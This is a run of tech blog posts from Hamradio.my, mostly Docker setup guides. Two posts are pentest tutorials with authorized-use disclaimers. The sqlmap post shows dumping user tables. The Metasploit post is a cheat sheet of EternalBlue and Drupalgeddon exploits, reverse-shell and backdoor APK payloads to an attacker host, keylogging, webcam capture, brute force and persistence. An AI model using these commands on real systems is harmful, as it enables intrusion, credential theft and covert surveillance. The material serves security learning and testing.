It’s organized by Michael KC8OWL, and the idea is simple: just send a short APRS message to ANSRVR or APRSPH sometime on Thursday (UTC).

That’s it. But like many of us, I sometimes forget to send mine. So I decided to build a little automation to take care of it.

Why I Built This

I wanted something that would:

• Automatically send my check-in message every Thursday
• Run quietly in the background
• Work on my Raspberry Pi server
• It is easy to manage with Docker

And that’s how the 9M2PJU APRS Thursday Check-in Bot was born.

What It Does

This bot runs 24/7 and sends the following APRS message every Thursday at 9:00 PM Malaysia Time (MYT):

HOTG Hello from CALLSIGN

It connects to aprs.hamradio.my:14580 using aprslib and sends the message exactly the way the #APRSThursday net expects.

You Can Also Test It Anytime

I also added a test mode. Just run:

docker compose run --rm aprs-thursday-check-in python /app/aprs-thursday-check-in.py --test

..and it sends the message instantly. Useful for checking if your server or internet connection is working properly.

Tech Stuff

• Written in Python
• Dockerized with a super lightweight python:alpine image
• Runs well on low-resource devices

You just clone the repo, build it with Docker, and let it run. No need to set up cron or anything.

Want to Use It?

Here’s the GitHub repo:
https://github.com/9M2PJU/9M2PJU-APRS-Thursday-Check-in-Bot

Setup is simple. Just:

git clone https://github.com/9M2PJU/9M2PJU-APRS-Thursday-Check-In-Bot.git
cd 9M2PJU-APRS-Thursday-Check-In-Bot
docker compose up -d --build

That’s it. The bot will now check in every Thursday on its own.

Final Thoughts

I built this for myself, but I figured it might help someone else, too. If you want to support the APRS community and keep message-based activity alive, this is an easy way to do it.

Feel free to fork, improve, or just use it as-is. I’ll keep updating it if I come up with new ideas.

The post 9M2PJU APRS Thursday Check-in Bot appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

What Is code-server?

code-server is an open-source project developed by Coder that allows you to run VS Code on a remote server and access it through a web browser. This setup provides a consistent development environment that can be accessed from any device, be it a laptop, tablet, or even a smartphone. By leveraging the power of cloud servers, code-server enables faster tests, compilations, and downloads, all while preserving your local device’s resources.

Key Features of code-server

• VS Code in the Browser: Experience the full functionality of VS Code, including IntelliSense, debugging, and Git integration, all within your browser.
• Remote Development: Develop on powerful cloud servers, reducing the load on your local machine and enabling resource-intensive tasks.
• Consistent Environment: Maintain a uniform development setup across different devices, ensuring consistency and reducing the “it works on my machine” problem.
• Extension Support: Install and use most VS Code extensions, enhancing your development workflow.
• Secure Access: Access your development environment securely from anywhere, with options for HTTPS and authentication.

Installation Guide

Setting up code-server is straightforward. The easiest way to install code-server is to use the official install script, which automates most of the process. This script attempts to use the system package manager if possible.

For Linux, macOS, and FreeBSD:

Run the following command in your terminal:

curl -fsSL https://code-server.dev/install.sh | sh

After installation, you can start code-server by running:

code-server

By default, code-server will be accessible at http://127.0.0.1:8080, and your password will be stored in ~/.config/code-server/config.yaml.

For Docker Users:

You can also run code-server in a Docker container:

docker run -it --name code-server -p 127.0.0.1:8080:8080 \
  -v "$HOME/.local:/home/coder/.local" \
  -v "$HOME/.config:/home/coder/.config" \
  -v "$PWD:/home/coder/project" \
  -u "$(id -u):$(id -g)" \
  -e "DOCKER_USER=$USER" \
  codercom/code-server:latest

This command mounts your current directory into the container and forwards your UID/GID so that all file system operations occur as your user outside the container.

Securing Your code-server Instance

To expose code-server securely to the internet, consider the following methods:

• Port Forwarding via SSH: If you have an SSH server on your remote machine, you can forward local ports to access code-server securely.
• Using Let’s Encrypt with Caddy or NGINX: For a more robust solution, you can set up HTTPS using Let’s Encrypt with web servers like Caddy or NGINX.
• Self-Signed Certificates: For internal use or testing, you can generate and use self-signed certificates to enable HTTPS.

These methods ensure that your code-server instance is accessible securely from anywhere.

Keeping code-server Up-to-Date

To ensure you have the latest features and security patches, it’s important to keep code-server updated. You can check for the latest releases on the GitHub Releases Page. To update, simply run the install script again:

curl -fsSL https://code-server.dev/install.sh | sh

This will download and install the latest version of code-server.

Final Thoughts

code-server empowers developers by providing a powerful, browser-based development environment that can be accessed from anywhere. Whether you’re working from a laptop, tablet, or smartphone, code-server ensures that you have a consistent and secure development setup at your fingertips.

By leveraging cloud servers, code-server enables faster development cycles and reduces the load on local machines, making it an ideal solution for modern development workflows.

The post code-server: Unlocking the Power of VS Code in Your Browser appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

If you’re into penetration testing, you’ve probably used Metasploit — the Swiss Army knife of offensive security. Pair it with Armitage, and you get a powerful GUI front-end for visualizing exploits, managing sessions, and collaborating with your team.

But installing Armitage today is a mess. It’s outdated, full of dependencies, and prone to breaking.

So here’s the fix: Run Metasploit + Armitage in Docker, either with a one-liner or a full-blown Docker Compose setup — and make it work with X11 GUI even on modern distros like CachyOS.

Tools Used

• Docker
• mirogula/kali_linux_metasploit_armitage
• X11 for GUI forwarding
• Tested on CachyOS (Arch-based)

Quick Start with docker run

Run this if you want it fast:

1. Install xhost

sudo pacman -S xorg-xhost

2. Allow local Docker GUI access

xhost +local:docker

For fish shell:

set -x DISPLAY :0

3. Run Armitage in Docker

docker run --rm \
  --name armitage \
  --hostname="kali_armitage" \
  -e DISPLAY=$DISPLAY \
  -v /tmp/.X11-unix:/tmp/.X11-unix \
  -v mg_metasploit_postgresql_data:/var/lib/postgresql \
  -v mg_metasploit_framework_dir:/usr/share/metasploit-framework \
  mirogula/kali_linux_metasploit_armitage

If everything is set up right, Armitage GUI will appear and connect to the bundled Metasploit framework + PostgreSQL.

Full Setup with Docker Compose (Recommended)

For a more reusable and clean lab, use this:

docker-compose.yml

services:
  armitage:
    image: mirogula/kali_linux_metasploit_armitage
    container_name: armitage
    hostname: kali_armitage
    environment:
      - DISPLAY=${DISPLAY}
    volumes:
      - /tmp/.X11-unix:/tmp/.X11-unix
      - mg_metasploit_postgresql_data:/var/lib/postgresql
      - mg_metasploit_framework_dir:/usr/share/metasploit-framework
    network_mode: host
    restart: unless-stopped
    stdin_open: true
    tty: true

volumes:
  mg_metasploit_postgresql_data:
  mg_metasploit_framework_dir:

Launch:

xhost +local:docker
docker compose up -d

Troubleshooting

Can't connect to X11 window server using ':0'

Fix: You didn’t run xhost +local:docker, or $DISPLAY is not set.

xhost +local:docker
echo $DISPLAY  # should output :0

In fish shell:

set -x DISPLAY :0

Test Your X11 Setup

Before launching Armitage, test with:

docker run --rm -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix archlinux xeyes

If xeyes appears, GUI forwarding works.

Reset the Lab

To delete everything and start fresh:

docker compose down -v

Volumes Used

These keep your sessions and configs between runs.

Tested on

• CachyOS (Arch-based)
• KDE Plasma (X11 session)
• Docker 25+

The post Armitage + Metasploit in Docker appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

When it comes to finding and exploiting SQL injection vulnerabilities, few tools are as powerful—or as easy to use—as sqlmap. It’s open-source, highly automated, and trusted by ethical hackers and penetration testers around the world.

What makes sqlmap even more convenient these days is the ability to run it inside a Docker container. No setup headaches. No dependency hell. Just one simple command, and you’re ready to start probing for vulnerable SQL endpoints.

What is SQLmap?

If you’re new to it, sqlmap is a command-line tool that automates the process of detecting and exploiting SQL injection vulnerabilities in web applications. It can do things like:

• Identify injection points in GET/POST parameters, cookies, or HTTP headers.
• Enumerate and dump databases, tables, and data.
• Extract usernames, passwords, and hashes.
• Gain shell access or even escalate privileges (in some cases).
• Support multiple DBMS: MySQL, PostgreSQL, Oracle, MSSQL, SQLite, and more.

It’s a serious tool for serious jobs—and also incredibly helpful for automated testing, bug bounty, and CTF competitions.

Why Docker?

Here’s the short version: with Docker, you skip the installation mess. sqlmap and all its dependencies come pre-packaged and ready to go. It runs in a containerized environment, isolated from your system. Perfect for quick jobs, disposable use, or repeatable tests.

Running sqlmap via Docker

Assuming Docker is already set up on your machine, here’s how to get sqlmap running in seconds:

docker run --rm -it --name sqlmap googlesky/sqlmap -u "http://example.com/vuln.php?id=1"

• --rm: Deletes the container when it exits.
• -it: Interactive mode, gives you the CLI.
• --name: Optional name for the container.
• Replace the -u URL with your own target.

If you’re working with a list of targets, you can mount a local volume:

docker run --rm -it -v "$(pwd)/targets:/targets" googlesky/sqlmap -m /targets/urls.txt

This lets sqlmap read URLs from a file (urls.txt) in your working directory.

Common sqlmap Use Cases

Let’s dig into some real-world examples you’re likely to use during bug bounties or testing.

1. Basic SQL Injection Test

docker run --rm -it googlesky/sqlmap -u "http://vulnerable.site/page.php?id=1"

sqlmap will automatically detect the injection point and start probing with different payloads.

2. Dump All Databases

Once a vulnerability is confirmed, dump all the available databases:

docker run --rm -it googlesky/sqlmap -u "http://vulnerable.site/page.php?id=1" --dbs

3. List Tables from a Specific Database

docker run --rm -it googlesky/sqlmap -u "http://vulnerable.site/page.php?id=1" -D my_database --tables

4. Dump Specific Table Data

docker run --rm -it googlesky/sqlmap -u "http://vulnerable.site/page.php?id=1" -D my_database -T users --dump

This is where things get juicy—usernames, passwords, emails, and other sensitive data often live here.

5. Authenticated SQLi Using Session Cookies

Got a session cookie from Burp Suite or browser dev tools?

docker run --rm -it googlesky/sqlmap -u "http://target.com/profile?id=5" --cookie="PHPSESSID=abc123xyz"

6. Send Raw HTTP Requests

If you’ve exported a full HTTP request (from Burp Suite for example), save it to request.txt, then:

docker run --rm -it -v "$(pwd):/data" googlesky/sqlmap -r /data/request.txt

Pro Tips for sqlmap Power Users

• Use --batch if you want non-interactive automation.
• Increase aggressiveness with --level=5 --risk=3.
• Save time using --flush-session to reset prior scan data.
• If the app uses a POST request or JSON API, use --data or --headers.
• Add --tor for scanning via Tor proxy (requires additional setup).

Use Responsibly

sqlmap is powerful. Too powerful to be used recklessly. It should only be used on systems you own, or have explicit permission to test. Unauthorized scanning is illegal and unethical.

Stick to:

• Your own dev/staging sites
• Bug bounty programs with clear rules of engagement
• Capture-the-flag (CTF) challenges
• Test labs like Hack The Box or DVWA

Final Thoughts

sqlmap is one of those tools that just works. When paired with Docker, it becomes even more portable and disposable—no setup, no cleanup. Whether you’re poking at a CTF target or doing a serious pentest, sqlmap should be in your arsenal.

Just remember: with great power comes great responsibility.

References

• Docker Image
• sqlmap GitHub
• OWASP SQLi Guide

The post Hacking Databases with sqlmap in Docker appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

Tenable Nessus has long been a trusted tool in the cybersecurity world for identifying vulnerabilities, misconfigurations, and compliance issues. And now, deploying it has never been easier—with Docker.

In this post, we’ll walk through how to deploy Tenable Nessus inside a Docker container, why it can be a powerful move for security teams and penetration testers, and how to get started quickly. Whether you’re running vulnerability scans on your internal infrastructure or integrating Nessus into your CI/CD pipeline, this setup gives you portability, repeatability, and convenience.

What is Tenable Nessus?

Tenable Nessus is one of the most widely used vulnerability scanners on the market. It helps IT and security professionals:

• Identify security vulnerabilities (e.g., CVEs, open ports, weak credentials)
• Detect misconfigurations across operating systems, applications, and devices
• Ensure compliance with standards such as CIS Benchmarks, HIPAA, PCI-DSS, and NIST
• Perform regular scans on internal and external assets

There are different flavors: Nessus Essentials, Nessus Professional, and Nessus Manager, with capabilities ranging from standalone use to centrally managed scanning nodes.

Why Use Docker for Nessus?

Running Nessus in Docker has several benefits:

• Quick to deploy: One command and it’s running.
• Isolated environment: Great for testing or short-term assessments.
• Repeatable: Spin up identical scanner environments anywhere.
• Multi-arch: Available for x86_64 and AArch64 (including Raspberry Pi!).

However, keep in mind:

• Nessus does not support persistent storage in Docker, so the configuration is lost if the container is removed.
• Not recommended to share the same NIC with other containers for security/isolation reasons.

Getting Started: Deploy Nessus with Docker

1. Install Docker

Make sure you have Docker installed:

docker --version

If not, install Docker via your OS package manager or from https://www.docker.com.

2. Pull the Nessus Docker Image

Pull the official image from Docker Hub:

docker pull tenable/nessus:latest-ubuntu

Other available tags:

• latest-oracle
• Specific versions like 10.6.1-ubuntu or 10.6.1-oracle

3. Run the Container

Here’s a typical command to launch Nessus:

docker run -d \
  --name nessus \
  -p 8834:8834 \
  -e USERNAME=admin \
  -e PASSWORD=SuperSecurePassword \
  -e ACTIVATION_CODE=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX \
  tenable/nessus:latest-ubuntu

Environment Variables:

Note: You can also link to Tenable Vulnerability Management or Tenable Security Center by setting additional linking variables.

4. Access the Web UI

Open your browser and go to:

• https://localhost:8834 for local machines
• https://<host-ip>:8834 for remote access

Ignore the SSL warning (self-signed certificate) and proceed.

Stop and Remove the Container

To stop and remove the Nessus container:

docker stop nessus
docker rm nessus

Keep in mind: No data is saved after removing the container unless you’ve built in some backup method.

Common Uses for Nessus

• Regular vulnerability assessments across internal networks
• Penetration testing and red team recon
• Testing new devices in isolated environments
• Compliance audits and configuration hardening
• Automation with CI/CD pipelines for security scanning
• External perimeter scanning (hosted on cloud VPS)

Pro Tips

• Always run Nessus in a secure and trusted network environment.
• Use docker logs nessus to view startup logs if something goes wrong.
• Consider using a reverse proxy (e.g., Traefik, NGINX) with HTTPS termination for cleaner access.
• Avoid using default ports in production to reduce scanning visibility.

References

• Tenable Nessus Docker Hub
• Tenable Official Documentation
• Nessus Environment Variables

Final Thoughts

Using Docker to deploy Nessus gives you the flexibility to test, scan, and assess environments rapidly. Just remember: without persistent storage, it’s a stateless scanner—perfect for CI/CD jobs, assessments, or isolated testing, but not for long-term use unless container persistence is manually handled.

The post Deploying Tenable Nessus in Docker: Fast, Portable Vulnerability Scanning appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

The Metasploit Framework is one of the most powerful and widely used penetration testing tools in the cybersecurity world. It provides security professionals, researchers, and ethical hackers with an extensive set of tools to test system vulnerabilities, exploit known weaknesses, and develop custom exploits. Whether you’re simulating attacks for learning purposes or conducting professional red team assessments, Metasploit offers a flexible and modular environment tailored for the job.

Developed and maintained by Rapid7, the framework supports thousands of exploits, payloads, encoders, and post-exploitation modules. From network scanning to privilege escalation, Metasploit remains a go-to toolkit for anyone serious about offensive security.

Metasploit in Docker: Portable Pen Testing

If you’re looking for an easy way to run Metasploit without setting it up from scratch, you’re in luck. The official Docker image, metasploitframework/metasploit-framework, lets you run the full framework in a containerized environment—no need to deal with complex dependencies or installation headaches.

Why Use the Docker Image?

Running Metasploit via Docker offers several benefits:

• Quick Setup: Pull the image and go—no need to install Ruby or configure PostgreSQL.
• Isolation: Keeps your host system clean by running everything in a sandboxed container.
• Portability: Move your pen-testing toolkit anywhere Docker runs.

Getting Started

To get started, just run:

docker pull metasploitframework/metasploit-framework

This will download the latest available image (last updated over a year ago at the time of writing), which is around 715 MB in size. While it’s not the most lightweight image, it includes everything you need to start using Metasploit right away.

Once downloaded, you can launch Metasploit like this:

docker run -it metasploitframework/metasploit-framework

You’ll be dropped into msfconsole, the interactive command-line interface for Metasploit. From there, you can begin scanning, exploiting, and exploring.

Common Metasploit Use Cases

1. Information Gathering

TCP Port Scan

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set THREADS 50
run

Banner Grabbing

use auxiliary/scanner/http/http_version
set RHOSTS 192.168.1.105
run

SMB Version Detection

use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.105
run

2. Exploitation

EternalBlue (MS17-010)

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.105
set LHOST 192.168.1.99
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

Exploiting a Web Server (Drupalgeddon)

use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.1.120
set TARGETURI /drupal
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.99
run

3. Payload Generation

Windows Reverse Shell EXE

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.99 LPORT=4444 -f exe > shell.exe

Android Backdoor APK

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.99 LPORT=4444 -o backdoor.apk

4. Post-Exploitation

Dump Windows Hashes

meterpreter > hashdump

Record Keystrokes

meterpreter > keyscan_start
meterpreter > keyscan_dump

Take Webcam Snapshot

meterpreter > webcam_snap

Escalate Privileges (Local Exploit Suggestor)

run post/multi/recon/local_exploit_suggester

5. Brute Force Attacks

SSH Brute Force

use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.105
set USERNAME root
set PASS_FILE /usr/share/wordlists/rockyou.txt
run

SMB Login Bruteforce

use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.1.0/24
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

6. Pivoting / Routing

Add Route via Compromised Session

route add 192.168.2.0 255.255.255.0 1

Use SOCKS Proxy via Metasploit

use auxiliary/server/socks_proxy
run

7. Social Engineering Attacks

Clone a Login Page (Credential Harvesting)

use auxiliary/server/capture/http_basic
set REALM "Login Required"
set SRVPORT 8080
set URIPATH /
run

8. Automation with Resource Scripts

Auto-Run Script Example

Create exploit.rc:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.105
set LHOST 192.168.1.99
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

Then run:

msfconsole -r exploit.rc

9. Maintaining Access

Persistent Reverse Shell

run persistence -U -i 5 -p 4444 -r 192.168.1.99

Upload and Execute Payload Later

meterpreter > upload shell.exe C:\\Users\\Victim\\AppData\\Roaming\\
meterpreter > execute -f C:\\Users\\Victim\\AppData\\Roaming\\shell.exe

10. Exploit Development

cd ~/.msf4/modules/exploits/custom/
nano my_custom_exploit.rb
# Write module using Ruby, then reload
msfconsole > reload_all

Reminder

These commands are for educational and authorized use only. Always have permission before testing on any network or system.

Resources

Metasploit comes with an active development community and plenty of documentation:

• Official Site: https://metasploit.com
• GitHub Repo: https://github.com/rapid7/metasploit-framework
• Bug Reports: https://r-7.co/MSF-BUGv1
• API Docs: https://rapid7.github.io/metasploit-framework/api
• Tutorials: Metasploit Unleashed and community wiki

Contributing to Metasploit

Interested in contributing? Head to the Dev Environment Setup Guide on GitHub. It walks you through installing dependencies, setting up your local environment, and submitting pull requests.

Metasploit is open-source and welcomes contributors—from seasoned developers to hobbyist hackers—so don’t hesitate to get involved.

Final Thoughts

The Metasploit Docker image makes it easier than ever to start hacking—legally and ethically, of course. Whether you’re testing your own systems or learning how attackers operate, having a containerized version of Metasploit streamlines the process and gets you into msfconsole faster than ever.

The post Penetration Testing with Metasploit Docker Image appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

Whether you’re a developer, a data enthusiast, or someone who simply loves to geek out over EV metrics, TeslaMate offers a comprehensive solution to monitor your vehicle’s health, efficiency, and usage patterns.

What Is TeslaMate?

TeslaMate is a self-hosted application that connects to your Tesla account via the official API. It retrieves real-time data about your vehicle’s state, charging sessions, trips, and more. This data is then stored in a PostgreSQL database and visualized through Grafana dashboards.

With TeslaMate, you can track:

• Battery Health: Monitor your battery’s state of health and degradation over time.
• Charging Stats: Analyze charging sessions, including energy added, cost, and efficiency.
• Drive Metrics: Record trip details such as distance, energy consumption, and driving behavior.
• Vehicle Status: Keep tabs on your car’s location, online/offline status, and more.

All of this is presented in a clean, intuitive web interface, ensuring you have all the insights you need at your fingertips.

Key Features

1. High Precision Drive Data Recording

TeslaMate captures detailed drive data, including energy consumption, distance traveled, and driving behavior. This allows you to analyze your driving habits and identify areas for improvement.

2. No Additional Vampire Drain

TeslaMate is designed to minimize energy consumption. It ensures that your vehicle falls asleep as soon as possible, preventing unnecessary battery drain.

3. Automatic Address Lookup

The application automatically converts GPS coordinates into human-readable addresses, making it easier to understand your vehicle’s locations during trips.

4. Easy Integration with Home Assistant

TeslaMate supports integration with Home Assistant via MQTT, allowing you to incorporate your Tesla’s data into your smart home automation system.

5. Geo-Fencing

Create custom locations to track when your vehicle enters or exits specific areas. This feature is useful for monitoring charging stations, home locations, or other points of interest.

6. Multiple Vehicle Support

TeslaMate supports multiple vehicles per Tesla account, making it ideal for owners of more than one Tesla.

7. Charge Cost Tracking

Track the cost of charging your vehicle by setting custom electricity rates for different locations. This helps you understand your charging expenses and optimize your usage.

Installation Guide

Setting up TeslaMate is straightforward, especially if you’re familiar with Docker. Here’s a basic docker-compose.yml configuration:

version: "3.3"
services:
  teslamate:
    image: teslamate/teslamate:latest
    restart: always
    environment:
      - ENCRYPTION_KEY=your_secure_key
      - DATABASE_USER=teslamate
      - DATABASE_PASS=your_password
      - DATABASE_NAME=teslamate
      - DATABASE_HOST=database
      - MQTT_HOST=mosquitto
    ports:
      - "4000:4000"
    volumes:
      - ./import:/opt/app/import
    cap_drop:
      - all
  database:
    image: postgres:17
    restart: always
    environment:
      - POSTGRES_USER=teslamate
      - POSTGRES_PASSWORD=your_password
      - POSTGRES_DB=teslamate
    volumes:
      - ./postgres:/var/lib/postgresql/data
  mosquitto:
    image: eclipse-mosquitto
    restart: always
    ports:
      - "1883:1883"
    volumes:
      - ./mosquitto:/mosquitto/config

After setting up your docker-compose.yml, run:

docker-compose up -d

Once the containers are up and running, you can access the TeslaMate web interface at http://localhost:4000.

Visualizing Your Data

TeslaMate comes bundled with Grafana dashboards that provide a comprehensive view of your vehicle’s data. These dashboards include:

• Battery Health: Track your battery’s state of health and degradation over time.
• Charging Stats: Analyze charging sessions, including energy added, cost, and efficiency.
• Drive Metrics: Record trip details such as distance, energy consumption, and driving behavior.
• Vehicle Status: Keep tabs on your car’s location, online/offline status, and more.

You can customize these dashboards to suit your preferences or create new ones to monitor specific metrics.

Integrations and Automation

TeslaMate supports integration with various platforms and services:

• Home Assistant: Integrate TeslaMate with your smart home automation system via MQTT.
• Node-RED: Use Node-RED to create custom automation workflows based on TeslaMate data.
• Telegram: Receive notifications about your vehicle’s status and events via Telegram.

These integrations allow you to automate tasks such as sending notifications when your vehicle reaches a specific location or when a charging session is complete.

Data Privacy and Security

One of the standout features of TeslaMate is its commitment to data privacy. Unlike cloud-based services, TeslaMate stores all your data locally, giving you full control over it. Your Tesla account credentials are encrypted and never stored in plaintext. Additionally, TeslaMate minimizes energy consumption to prevent unnecessary battery drain.

Real-World Use Cases

TeslaMate is ideal for various scenarios:

• Personal Use: Monitor your driving habits, track charging costs, and keep an eye on your vehicle’s health.
• Fleet Management: For businesses with multiple Teslas, TeslaMate provides a centralized dashboard to monitor all vehicles.
• Data Analysis: Researchers and data enthusiasts can analyze Tesla data for insights into EV performance and usage patterns.

Final Thoughts

TeslaMate is a robust, feature-rich solution for Tesla owners who want to take control of their vehicle’s data. Its self-hosted nature ensures privacy and customization, while its integrations and visualizations provide valuable insights into your driving and charging behaviors.

Whether you’re a developer, a data enthusiast, or someone who simply loves to geek out over EV metrics, TeslaMate offers a comprehensive solution to monitor your vehicle’s health, efficiency, and usage patterns.

https://github.com/teslamate-org/teslamate

The post TeslaMate: The Ultimate Self-Hosted Data Logger for Your Tesla appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

This is where WUD, short for What’s Up Docker, steps in as a game-changer.

WUD is a lightweight, open-source solution that continuously monitors your running Docker containers and alerts you when new versions of the base images are available. It saves time, ensures better security, and brings automation to your software maintenance workflow. If you’re running a homelab, hosting your own services, or managing production infrastructure, WUD is an essential tool in your DevOps toolbox.

Why Should You Care About Image Updates?

Let’s face it—container image updates often carry critical fixes:

• Security patches that close zero-day exploits
• Performance improvements that enhance your service responsiveness
• Bug fixes and new features that your applications benefit from immediately

Not updating means you’re running outdated, potentially vulnerable software. But manually checking all containers regularly is unrealistic. Automating this check is the smartest move—and that’s exactly what WUD offers.

Meet WUD: What’s Up Docker

WUD is a smart container update monitor. It inspects the Docker images behind your currently running containers and checks if newer versions are available in the registries. If it finds updates, WUD notifies you instantly—helping you take immediate action.

Built for Flexibility

WUD integrates beautifully with:

• Docker
• Docker Compose
• Private or public registries
• A wide range of notification platforms (email, Slack, MQTT, webhooks)

It supports custom triggers and regex filtering, giving you full control over how you track and react to image updates.

Web UI: Your Update Control Tower

The included web interface is clean, intuitive, and mobile-friendly. From a centralized dashboard, you can:

• View all running containers
• See the image version in use
• Get update availability in real-time
• Customize monitoring preferences

This turns WUD from just another background service into a powerful UI-driven monitoring assistant.

Getting Started in 5 Minutes

Deploying WUD is surprisingly simple. Here’s a basic example using Docker Compose:

version: "3.3"
services:
  wud:
    image: fmartinou/whats-up-docker
    container_name: wud
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock
    ports:
      - "3000:3000"
    environment:
      - WUD_TRIGGER_EMAIL_TO=you@example.com
      - WUD_TRIGGER_EMAIL_SMTP_HOST=smtp.example.com
      - WUD_TRIGGER_EMAIL_SMTP_PORT=587
      - WUD_TRIGGER_EMAIL_SMTP_USERNAME=your_username
      - WUD_TRIGGER_EMAIL_SMTP_PASSWORD=your_password

Once it’s running, visit http://localhost:3000 (or your server’s IP) to access the web dashboard.

Notifications: Choose Your Channel

WUD can send notifications via:

• Email: Ideal for personal servers or smaller teams.
• Slack: Integrates well with DevOps pipelines.
• MQTT: Perfect for IoT/automation setups.
• Webhooks: Trigger custom update workflows (like automatic redeploys or backups).

You can even set up multiple triggers per container.

Stay Secure, Stay Updated

Running outdated containers can expose your system to vulnerabilities. WUD helps you avoid this by:

• Prompting early patching
• Monitoring containers 24/7
• Supporting multi-arch and registry-compatible images

It doesn’t replace update automation tools like Watchtower, but complements them with granular visibility before updates are applied.

Real-World Use Cases

Here are some great examples of WUD in the wild:

• Self-hosted services: Running Pi-hole, Home Assistant, Nextcloud? Get alerts before your services become outdated or vulnerable.
• Development environments: Developers using Docker-based stacks can be notified of new base images (Node, Python, Java) for better consistency and performance.
• Production clusters: Ops teams can integrate WUD with CI/CD pipelines to schedule updates safely.
• Homelab setups: Perfect for tinkerers and home sysadmins to maintain their containers easily.

WUD vs. Watchtower

Feature	WUD	Watchtower
Web UI	Yes	No
Notification	Flexible	Email, Slack
Auto-updates	No	Yes
Transparency	High control	Can be automatic

Use WUD for visibility, and Watchtower if you want automatic image pulls and container redeploys.

Community & Support

WUD is open-source and actively developed on GitHub:
https://github.com/getwud/wud

You’ll find extensive documentation covering everything from basic setup to advanced features, like authentication, registry credentials, and notifications via third-party services.

Got issues or feature ideas? Just open an issue and join the community discussions.

Final Thoughts

Keeping containers up to date should never be an afterthought. With WUD, you’re no longer flying blind when it comes to Docker image updates. Whether you’re a sysadmin, homelabber, DevOps engineer, or a curious tinkerer, WUD gives you real-time visibility and control over what’s running in your infrastructure.

Try it once—WUD will become your new best friend in Docker image hygiene.

TL;DR

• WUD = “What’s Up Docker”
• Monitors Docker containers for image updates
• Notifies you via email, Slack, MQTT, or webhook
• Has a clean and powerful web UI
• Easy to set up and fully customizable

Keep your containers fresh and your system secure with WUD.

The post Keeping Your Docker Containers Fresh with WUD appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

What Is ACARS Hub?

ACARS Hub is a Docker container designed to collect, parse, and visualize messages from a variety of aircraft communication systems. If you’ve ever used acarsdec, dumpvdl2, or dumphfdl, you’ll know that raw output can be technical and terse. ACARS Hub improves on this by enriching the decoded messages with data from the amazing team at Airframes.io, making messages easier to read and interpret.

It works across architectures—amd64, arm64, armv7, armv6, and even 386—making it perfect for devices like the Raspberry Pi.

What You’ll Need

To get started, you’ll need:

• A Linux system that can run Docker (a Raspberry Pi works great)
• One or more RTL-SDR dongles (at least one for ACARS, ideally a second for VDLM2)
• Docker and Docker Compose
• One or more SDR decoders (see below)

Decoding support includes:

• acarsdec (recommended: airframes fork)
• dumpvdl2 (preferred VDLM2 decoder)
• vdlm2dec
• dumphfdl
• satdump for Inmarsat
• gr-iridium toolkit for Iridium
• JAERO for L-band satellite decoding

All these decoders can run externally and push decoded JSON to ACARS Hub over UDP.

Ports and Connectivity

Here are the main ports you’ll deal with:

Using these, you can stream messages into the container and even pipe data out to other systems for further analysis or visualization.

Docker-Compose: The Fast Track Setup

Here’s a minimal working setup for your docker-compose.yaml:

services:
  acarshub:
    image: sdrenthusiasts/acarshub:latest
    ports:
      - 80:80
      - 5550:5550/udp
      - 5555:5555/udp
      - 5556:5556/udp
      - 5557:5557/udp
      - 5558:5558/udp
      - 15550:15550
      - 15555:15555
      - 15556:15556
      - 15557:15557
      - 15558:15558
    volumes:
      - acarshub_data:/run/acars
    environment:
      - ENABLE_WEB=true
      - ENABLE_ACARS=external
      - ENABLE_VDLM=external
      - DB_SAVEALL=false
volumes:
  acarshub_data:

This setup enables ACARS and VDLM2 processing, exposes the necessary ports, and stores data on a local volume.

Performance Tips

Running a database on something lightweight like a Raspberry Pi? You’ll want to:

• Mount /run/acars/ as a tmpfs to reduce SD card writes
• Set DB_SAVEALL=false to avoid storing uninformative messages
• Limit data retention by adjusting DB_SAVE_DAYS

Want better search speed? Temporarily enable AUTO_VACUUM=true to clean the database.

Enhancing Your Map with ADS-B Data

To display ADS-B targets on the ACARS Hub map:

1. Run tar1090 and readsb on the same host
2. Enable ADS-B in ACARS Hub with: - ENABLE_ADSB=true - ADSB_URL=http://tar1090/data/aircraft.json
3. Set your lat/lon for correct range rings

You’ll be able to click aircraft on the map and see related messages.

Make the Data Accurate for Your Region

Airline codes can be tricky. If you notice callsigns mapping incorrectly (e.g. UPS showing up as BahamasAir), you can fix them locally using the IATA_OVERRIDE environment variable. Example:

IATA_OVERRIDE=UP|UPS|United Parcel Service;US|AAL|American Airlines

Web Interface & Tricks

ACARS Hub has a responsive web UI on port 80. You can:

• Press p on the Live Messages page to pause auto-scroll
• Use the search page to filter messages by keyword or callsign
• Connect other tools or visualizers to exposed JSON ports like 15555 (VDLM2) or 15550 (ACARS)

Future Developments

The project’s active and rapidly evolving. Upcoming features include:

• A revamped UI
• Desktop apps
• Improved message matching between ACARS and ADS-B

Get Help or Contribute

ACARS Hub is open-source and community-driven. You can:

• Raise issues or contribute code on GitHub
• Join the Discord server for support and ideas

Whether you’re a seasoned SDR hobbyist or new to decoding, ACARS Hub makes it easier than ever to monitor real-world aircraft communication with real-time visualization and analysis.

